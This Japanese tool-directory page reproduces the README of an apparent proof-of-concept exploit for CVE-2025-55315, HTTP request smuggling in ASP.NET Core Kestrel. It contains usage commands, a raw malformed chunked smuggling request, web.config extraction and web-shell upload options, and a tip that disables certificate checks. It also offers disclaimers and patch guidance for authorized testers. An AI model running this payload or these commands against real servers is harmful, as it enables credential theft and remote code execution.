Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC エクスプロイト | Kitploit
ツール/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC エクスプロイト

リポジトリを見る
859ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55315 ペネトレーションテストツール

ASP.NET Core Kestrel 向け HTTP リクエストスマグリング攻撃ツール

Python Version CVE CVSS License


⚠️ 法的注意事項

このツールは許可されたセキュリティテスト専用です!

  • 所有している、またはテストのための明示的な書面による許可を得ているシステムでのみ使用してください
  • コンピュータシステムへの不正アクセスは違法です
  • ツール作成者は誤用について一切の責任を負いません
  • このツールを使用することにより、お客様は完全な法的責任を負うものとします

📋 概要

CVE-2025-55315 (ASP.NET Core Kestrel HTTP リクエストスマグリング脆弱性) のためのプロフェッショナルなペネトレーションテストツールです。このツールは、包括的な悪用機能を備えた単一ターゲット分析用に設計されています。

CVE-2025-55315 とは?

ASP.NET Core Kestrel Web サーバー (CVSS 9.9/10) におけるクリティカルな HTTP リクエストスマグリング脆弱性であり、攻撃者が以下を実行可能です:

  • 認証のバイパス
  • 認証情報とセッショントークンの窃取
  • サーバーサイドリクエストフォージェリ (SSRF) の実行
  • キャッシュの汚染
  • Web シェルのアップロードとリモートコード実行の達成

影響を受けるバージョン:

  • .NET Core 3.0 から .NET 9.0.9
  • 修正バージョン: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ 機能

コア機能

  • ✅ 単一ターゲット分析 - 特定のターゲットに焦点を当てたペネトレーションテスト
  • ✅ 自動エンドポイント検出 - 一般的な ASP.NET Core エンドポイントを発見
  • ✅ 手動エンドポイントテスト - 関心のある特定のエンドポイントをテスト
  • ✅ 脆弱性検出 - 正確な CVE-2025-55315 検出
  • ✅ web.config 抽出 - リクエストスマグリングを介した構成ファイルの読み取り
  • ✅ Web シェルアップロード - オプションの Web シェル展開機能
  • ✅ 詳細レポート - JSON およびテキスト形式のレポート
  • ✅ 安全機能 - 破壊的なアクションに対する複数の確認プロンプト

技術的特徴

  • HTTP/1.1 および HTTPS 対応
  • カスタムポート対応
  • 設定可能なタイムアウト
  • 詳細デバッグモード
  • カラーコード化された端末出力
  • SSL 証明書検証バイパス (テスト用)

🔧 インストール

必要条件

root@kitploit:~
# Python 3.7 以上
python3 --version

# 外部依存関係なし - 標準ライブラリのみ使用

ダウンロード

root@kitploit:~
# ツールをクローンまたはダウンロード
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# 実行可能にする
chmod +x cve_2025_55315_PoC.py

🚀 クイックスタート

基本的な脆弱性スキャン

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

これにより:

  1. サーバー情報を収集
  2. アクティブなエンドポイントを自動検出
  3. 各エンドポイントで CVE-2025-55315 をテスト
  4. 結果を端末に表示

特定のエンドポイントをテスト

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

web.config 抽出を含むフルスキャン

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

アドバンスト: 完全な悪用 (許可された場合のみ!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 使用例

例 1: クイックチェック

シナリオ: 本番サーバーが脆弱かどうかを確認

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

予想時間: 30〜60 秒


例 2: 詳細スキャン

シナリオ: 詳細出力付きの包括的なエンドポイントスキャン

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

予想時間: 2〜5 分


例 3: 複数のエンドポイントを対象

シナリオ: 特定のクリティカルなエンドポイントをテスト

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

例 4: 非 SSL ターゲット

シナリオ: 内部 HTTP サーバーをテスト

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 コマンドラインオプション

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

必須引数:
  -t, --target         ターゲットのホスト名または URL (例: target.com)

オプション引数:
  -p, --port           ポート番号 (デフォルト: SSL の場合は 443、非 SSL の場合は 80)
  -e, --endpoint       テストする特定のエンドポイント (複数回使用可能)
  --no-ssl             SSL/HTTPS を無効にする (HTTP を使用)
  --read-config        web.config ファイルの読み取りを試みる
  --upload-shell       Web シェルのアップロードを試みる (確認が必要)
  -o, --output         レポートをファイルに保存
  -v, --verbose        詳細出力を有効にする
  --timeout            ソケットタイムアウト (秒) (デフォルト: 10)
  -h, --help           ヘルプメッセージを表示

🔍 出力の理解

脆弱なシステムの例

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

解釈:

  • 🔴 クリティカル脆弱性が検出されました
  • 🔴 複数のエンドポイントが脆弱です
  • 🔴 設定ファイルが正常に抽出されました
  • ⚡ 至急: .NET 8.0.21+ または 9.0.10+ に更新してください

セキュアなシステムの例

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

解釈:

  • ✅ システムはセキュアです
  • ✅ パッチが適用された Kestrel バージョンを実行中
  • ✅ すべての不正なリクエストは拒否されました

🛡️ 安全性と倫理

承認チェックリスト

このツールを実行する前に、以下を確認してください:

  • ターゲットシステムを所有している、または
  • テストのための書面による許可を得ている、かつ
  • セキュリティチームに通知済み、かつ
  • ロールバック計画がある、かつ
  • 法的影響を理解している

組み込みの安全機能

  1. 2段階確認 - 開始前にツールが許可を求めます
  2. Web シェルアップロード確認 - 大文字で "YES" と入力する必要があります
  3. レート制限 - 自動検出中のリクエスト間に遅延を挿入
  4. タイムアウト保護 - 接続のハングを防止
  5. 詳細なログ記録 - すべてのアクションが監査証跡のために記録されます

🔬 技術的詳細

悪用手法

このツールは、不正なチャンク転送エンコーディングを使用して CVE-2025-55315 を悪用します:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← 脆弱性: \r\n の代わりに単独の \n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← これが別のリクエストになる
Host: target.com

なぜ機能するのか:

  1. プロキシサーバーは \n を行終端として認識 → 単一のリクエストとして処理
  2. Kestrel (脆弱) は \n を無視 → スマグリングされた GET を別のリクエストとして扱う
  3. スマグリングされたリクエストは別のユーザーのセッションコンテキストで実行される可能性がある

検出ロジック


🐛 トラブルシューティング

接続失敗

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

解決策:

  • ターゲットに到達可能か確認: ping target.com
  • ポート番号が正しいか確認
  • SSL の有無を試す: --no-ssl
  • ファイアウォールルールを確認

SSL 証明書エラー

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

解決策: ツールはすでに証明書検証を無効にしています。問題が解決しない場合:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

タイムアウトエラー

root@kitploit:~
[WARNING] No response - possible timeout

解決策:

  • タイムアウトを増やす: --timeout 30
  • ネットワーク接続を確認
  • ターゲットが遅いか過負荷の可能性あり

アップロードがブロックされた

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

説明:

  • サーバー構成が PUT/POST メソッドをブロックしている
  • WAF/IPS がアップロードをブロックしている
  • ファイル権限が書き込みを許可していない

これは正常です - すべての脆弱なシステムがファイルアップロードを許可するわけではありません。


📚 参考文献

CVE-2025-55315 リソース

  1. Microsoft セキュリティアドバイザリ: https://github.com/dotnet/aspnetcore/issues/64033

  2. NVD データベース: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. Praetorian 研究 ($10k バグバウンティ): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. Andrew Lock の技術分析: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

HTTP リクエストスマグリング

  1. PortSwigger 研究: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 カスタマイズ

カスタムエンドポイントの追加

スクリプト内の COMMON_ENDPOINTS を編集:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # ここにエンドポイントを追加
]

カスタム Web シェルの使用

upload_webshell() メソッドを修正:

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- ここにカスタム ASPX Web シェル -->
        '''

📝 問題の報告

バグを見つけた場合や提案がある場合:

  1. 詳細モードで実行: -v
  2. 完全な出力を保存: -o debug.txt
  3. 以下を含める:
    • Python バージョン
    • 使用したコマンド
    • エラーメッセージ
    • 期待される動作と実際の動作

⚖️ 法的免責事項

root@kitploit:~
このツールは「現状のまま」、教育目的および許可された
セキュリティテスト目的でのみ提供されます。

著作者は:
❌ 違法行為を推奨しません
❌ 誤用について責任を負いません
❌ いかなる損害についても責任を負いません
❌ 法的アドバイスを提供しません

このツールを使用することにより、お客様は以下に同意します:
✅ 許可されたシステムでのみ使用すること
✅ 完全な法的責任を受け入れること
✅ すべての該当する法律を遵守すること
✅ 倫理的なハッキングの原則に従うこと

無断使用は固く禁止されており、違法です!

🎓 教育目的

このツールは以下向けに作成されました:

  • セキュリティ研究者
  • ペネトレーションテスター
  • バグバウンティハンター
  • システム管理者
  • セキュリティ意識向上トレーニング
  • 許可されたセキュリティ評価

対象外:

  • 悪意のある攻撃
  • 不正アクセス
  • 競合偵察
  • 違法行為

🙏 謝辞

  • Microsoft セキュリティレスポンスセンター - CVE の開示とパッチ提供
  • Praetorian Security - 元の脆弱性研究
  • Andrew Lock - 詳細な技術分析
  • セキュリティコミュニティ - 責任ある開示の実践

📄 ライセンス

教育および許可されたセキュリティテスト専用

このツールは教育目的および許可されたセキュリティテストのために提供されています。商用利用、再配布、または悪意のある目的での使用は固く禁止されています。


🔐 最終警告

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  このツールを責任を持って合法的に使用してください!                ║
║                                                             ║
║  コンピュータシステムへの不正アクセスは犯罪です。                  ║
║  テストを実行する前に必ず書面による許可を取得してください。          ║
║  責任ある開示の実践に従ってください。                            ║
║                                                             ║
║  楽しい (合法的な) ハッキングを!                               ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝

ツールをダウンロード
サーバー応答解釈ステータス
400 Bad RequestKestrel が不正なチャンクを拒否✅ セキュア (パッチ適用済み)
複数の HTTP/1.12 つの個別の応答を受信❌ 脆弱
500 または 502内部サーバーエラー⚠️ 脆弱の可能性あり
通常の 200 OKリクエストが受け入れられました⚠️ 判断不可